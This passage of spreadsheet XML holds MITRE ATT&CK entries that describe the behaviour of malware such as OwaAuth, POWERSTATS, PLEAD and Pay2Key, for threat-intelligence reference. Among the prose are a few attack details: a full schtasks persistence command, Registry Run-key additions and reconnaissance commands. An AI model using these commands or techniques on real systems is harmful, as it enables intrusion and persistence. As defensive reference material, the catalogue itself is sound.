    <t>[OwaAuth](https://attack.mitre.org/software/S0072) DES-encrypts captured credentials using the key 12345678 before writing the credentials to a log file.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) has been loaded onto Exchange servers and disguised as an ISAPI filter (DLL file). The IIS w3wp.exe process then loads the malicious DLL.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) has a command to list its directory and logical drives.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) captures and DES-encrypts credentials before writing the username and password to a log file, &lt;code&gt;C:\log.txt&lt;/code&gt;.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) uses the filename owaauth.dll, which is a legitimate file that normally resides in &lt;code&gt;%ProgramFiles%\Microsoft\Exchange Server\ClientAccess\Owa\Auth\&lt;/code&gt;; the malicious file by the same name is saved in &lt;code&gt;%ProgramFiles%\Microsoft\Exchange Server\ClientAccess\Owa\bin\&lt;/code&gt;.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) has a command to timestop a file or directory.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) uses incoming HTTP requests with a username keyword and commands and handles them as instructions to perform actions.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) is a Web shell that appears to be exclusively used by [Threat Group-3390](https://attack.mitre.org/groups/G0027). It is installed as an ISAPI filter on Exchange servers and shares characteristics with the [China Chopper](https://attack.mitre.org/software/S0020) Web shell.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) has the ability to create reverse shells with Perl scripts.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) has the ability to list and extract data from SQL databases.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) has the ability to copy files on a compromised host.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can use a decryption mechanism to process a user supplied password and allow execution.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can delete scripts from a subdirectory of /tmp after they are run.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) has the ability to list files and file characteristics including extension, size, ownership, and permissions.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can upload and download files to and from compromised hosts.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) has the ability to modify file permissions.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can display the /etc/passwd file on a compromised host.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can scan networks for open ports and listening services.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can use encryption and base64 encoding to hide strings and to enforce access control once deployed.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can use predefined users and passwords to execute brute force attacks against SSH, FTP, POP3, MySQL, MSSQL, and PostgreSQL services.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can list PHP server configuration details.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can issue commands via HTTP POST.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can gain remote access and execution on target web servers.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P2P ZeuS](https://attack.mitre.org/software/S0016) added junk data to outgoing UDP packets to peer implants.(Citation: Dell P2P ZeuS)</t>
  </si>
  <si>
    <t>[PHOREAL](https://attack.mitre.org/software/S0158) is capable of manipulating the Registry.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[PHOREAL](https://attack.mitre.org/software/S0158) communicates via ICMP for C2.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[PHOREAL](https://attack.mitre.org/software/S0158) is capable of creating reverse shell.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>An older variant of [PLAINTEE](https://attack.mitre.org/software/S0254) performs UAC bypass.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) has downloaded and executed additional plugins.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) uses &lt;code&gt;reg add&lt;/code&gt; to add a Registry Run key for persistence.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) performs the &lt;code&gt;tasklist&lt;/code&gt; command to list running processes.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) gains persistence by adding the Registry key &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) encodes C2 beacons using XOR.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) collects general system enumeration data about the infected machine and checks the OS version.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) uses the &lt;code&gt;ipconfig /all&lt;/code&gt; command to gather the victim’s IP address.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) uses cmd.exe to execute commands on the victim’s machine.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to list open windows on the compromised host.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to steal saved passwords from Microsoft Outlook.(Citation: ESET PLEAD Malware July 2018)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to steal saved credentials from web browsers.(Citation: TrendMicro BlackTech June 2017)(Citation: ESET PLEAD Malware July 2018)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to delete files on the compromised host.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to list drives and files on the compromised host.(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to upload and download files to and from an infected host.(Citation: JPCert PLEAD Downloader June 2018)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) samples were found to be highly obfuscated with junk code.(Citation: ESET PLEAD Malware July 2018)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has been executed via malicious e-mail attachments.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has been executed via malicious links in e-mails.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to list processes on the compromised host.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to proxy network communications.(Citation: JPCert PLEAD Downloader June 2018)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has used RC4 encryption to download modules.(Citation: JPCert PLEAD Downloader June 2018)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has used HTTP for communications with command and control (C2) servers.(Citation: JPCert PLEAD Downloader June 2018)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to execute shell commands on the compromised host.(Citation: JPCert PLEAD Downloader June 2018)</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) has used AOL Instant Messenger for C2.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) has been delivered through compromised sites acting as watering holes.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) can conduct file browsing.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) can enumerate processes.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) can perform screen capturing.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) can identify system information, including battery status.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) encrypts C2 traffic with AES and RSA.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) uploads data in 2048-byte chunks.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) uses a DGA to derive command and control URLs from a word list.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) downloads and executes additional PowerShell code and Windows binaries.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) appends a file signature header (randomly selected from six file types) to encrypted data prior to upload or download.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) uses PowerShell to execute various commands, one to execute its payload.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) modifies timestamps of all downloaded executables to match a randomly selected file created prior to 2013.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>Windows Management Instrumentation Event Subscription</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) uses a WMI event subscription to establish persistence.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>[POWERSOURCE](https://attack.mitre.org/software/S0145) uses DNS TXT records for C2.(Citation: FireEye FIN7 March 2017)(Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>[POWERSOURCE](https://attack.mitre.org/software/S0145) has been observed being used to download [TEXTMATE](https://attack.mitre.org/software/S0146) and the Cobalt Strike Beacon payload onto victims.(Citation: FireEye FIN7 March 2017)</t>
  </si>
  <si>
    <t>If the victim is using PowerShell 3.0 or later, [POWERSOURCE](https://attack.mitre.org/software/S0145) writes its decoded payload to an alternate data stream (ADS) named kernel32.dll that is saved in &lt;code&gt;%PROGRAMDATA%\Windows\&lt;/code&gt;.(Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>[POWERSOURCE](https://attack.mitre.org/software/S0145) is a PowerShell backdoor.(Citation: FireEye FIN7 March 2017)(Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>[POWERSOURCE](https://attack.mitre.org/software/S0145) queries Registry keys in preparation for setting Run keys to achieve persistence.(Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>[POWERSOURCE](https://attack.mitre.org/software/S0145) achieves persistence by setting a Registry Run key, with the path depending on whether the victim account has user or administrator access.(Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has encrypted C2 traffic with RSA.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has used useless code blocks to counter analysis.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can use DCOM (targeting the 127.0.0.1 loopback address) to execute additional payloads on compromised hosts.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can upload files from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can deobfuscate the main backdoor code.(Citation: ClearSky MuddyWater Nov 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can disable Microsoft Office Protected View by changing Registry keys.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can use DDE to execute additional payloads on compromised hosts.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has connected to C2 servers through proxies.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can delete all files on the C:\, D:\, E:\ and, F:\ drives using [PowerShell](https://attack.mitre.org/techniques/T1059/001) Remove-Item commands.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve and execute additional [PowerShell](https://attack.mitre.org/techniques/T1059/001) payloads from the C2 server.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can use JavaScript code for execution.(Citation: ClearSky MuddyWater Nov 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve usernames from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has created a scheduled task named "MicrosoftEdge" to establish persistence.(Citation: ClearSky MuddyWater Nov 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can use Mshta.exe to execute additional payloads on compromised hosts.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) uses character replacement, [PowerShell](https://attack.mitre.org/techniques/T1059/001) environment variables, and XOR encoding to obfuscate code. [POWERSTATS](https://attack.mitre.org/software/S0223)'s backdoor code is a multi-layer obfuscated, encoded, and compressed blob. (Citation: FireEye MuddyWater Mar 2018)(Citation: ClearSky MuddyWater Nov 2018) [POWERSTATS](https://attack.mitre.org/software/S0223) has used PowerShell code with custom string obfuscation (Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) uses PowerShell for obfuscation and execution.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: ClearSky MuddyWater Nov 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has used &lt;code&gt;get_tasklist&lt;/code&gt; to discover processes on the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has established persistence through a scheduled task using the command &lt;code&gt;”C:\Windows\system32\schtasks.exe” /Create /F /SC DAILY /ST 12:00 /TN MicrosoftEdge /TR “c:\Windows\system32\wscript.exe C:\Windows\temp\Windows.vbe”&lt;/code&gt;.(Citation: ClearSky MuddyWater Nov 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can sleep for a given number of seconds.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve screenshots from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has detected security tools.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) encoded C2 traffic with base64.(Citation: Unit 42 MuddyWater Nov 2017)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve OS name/architecture and computer/domain name information from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve IP, network adapter configuration information, and domain from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has the ability to identify the username on the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can use VBScript (VBE) code for execution.(Citation: ClearSky MuddyWater Nov 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can use WMI queries to retrieve data from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)(Citation: ClearSky MuddyWater Nov 2018)</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) is written in PowerShell.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) can install a Registry Run key for persistence.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) has the ability to dump password hashes.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) has used AES for encrypting C2 traffic.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) has used HTTP/HTTPS for C2 traffic.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) can use WMI for persistence.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) can use DNS for C2 communications.(Citation: FireEye APT34 Dec 2017)(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect user account information by running &lt;code&gt;net user /domain&lt;/code&gt; or a series of other commands on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect domain group information by running &lt;code&gt;net group /domain&lt;/code&gt; or a series of other commands on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may enumerate user directories on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) can download or upload files from its C2 server.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect local group information by running &lt;code&gt;net localgroup administrators&lt;/code&gt; or a series of other commands on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) is written in PowerShell.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect process information by running &lt;code&gt;tasklist&lt;/code&gt; on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may query the Registry by running &lt;code&gt;reg query&lt;/code&gt; on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) persists through a scheduled task that executes it every minute.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) can capture a screenshot from a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect information on the victim's anti-virus software.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) can use base64 encoded C2 communications.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect information about the system by running &lt;code&gt;hostname&lt;/code&gt; and &lt;code&gt;systeminfo&lt;/code&gt; on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect network configuration data by running &lt;code&gt;ipconfig /all&lt;/code&gt; on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect active network connections by running &lt;code&gt;netstat -an&lt;/code&gt; on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect information about the currently logged in user by running &lt;code&gt;whoami&lt;/code&gt; on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) can use HTTP for C2 communications.(Citation: FireEye APT34 Dec 2017)(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) can execute commands from its C2 server.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may use WMI when collecting information about a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>AppCert DLLs</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can establish using a AppCertDLLs Registry key.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has Gzipped information and saved it to a random temp file before exfil.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has used [PowerShell](https://attack.mitre.org/techniques/T1059/001) to decode base64-encoded assembly.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can delete files written to disk.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can download additional files and payloads to compromised hosts.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can gather user names.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has saved information to a random temp file before exfil.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) mimics filenames from %SYSTEM%\System32 to hide DLLs in %WINDIR% and/or %TEMP%.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has hashed most its code's functions and encrypted payloads with base64 and XOR.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has used [PowerShell](https://attack.mitre.org/techniques/T1059/001) scripts.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has used python scripts.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has been observed using a Registry Run key.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can load a DLL using Rundll32.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can gather AVs registered in the system.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can load a DLL using the LoadLibrary API.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can gather system information such as computer names.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) enables remote interaction and can obtain additional code over HTTPS GET and POST requests.(Citation: FireEye Fin8 May 2016)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHTRACK](https://attack.mitre.org/software/S0197) scrapes memory for properly formatted payment card data.(Citation: FireEye Fin8 May 2016)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[PUNCHTRACK](https://attack.mitre.org/software/S0197) aggregates collected data in a tmp file.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[PUNCHTRACK](https://attack.mitre.org/software/S0197) is loaded and executed by a highly obfuscated launcher.(Citation: FireEye Fin8 May 2016)</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) creates a backdoor through which remote attackers can retrieve files.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) creates a backdoor through which remote attackers can delete files.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) creates a backdoor through which remote attackers can retrieve lists of files.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) creates a backdoor through which remote attackers can upload files.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>LSASS Driver</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) establishes by infecting the Security Accounts Manager (SAM) DLL to load a malicious DLL dropped to disk.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) creates a backdoor through which remote attackers can retrieve lists of running processes.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) creates a backdoor through which remote attackers can retrieve information such as hostname and free disk space.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>[Pass-The-Hash Toolkit](https://attack.mitre.org/software/S0122) can perform pass the hash.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) has used RSA encrypted communications with C2.(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) can encrypt data on victim's machines using RSA and AES algorithms in order to extort a ransom payment for decryption.(Citation: ClearkSky Fox Kitten February 2020)(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) can remove its log file from disk.(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) has designated machines in the compromised network to serve as reverse proxy pivot points to channel communications with C2.(Citation: ClearkSky Fox Kitten February 2020)(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) has sent its public key to the C2 server over TCP.(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) can stop the MS SQL service at the end of the encryption process to release files locked by the service.(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) has the ability to gather the hostname of the victim machine.(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) can identify the IP and MAC addresses of the compromised host.(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
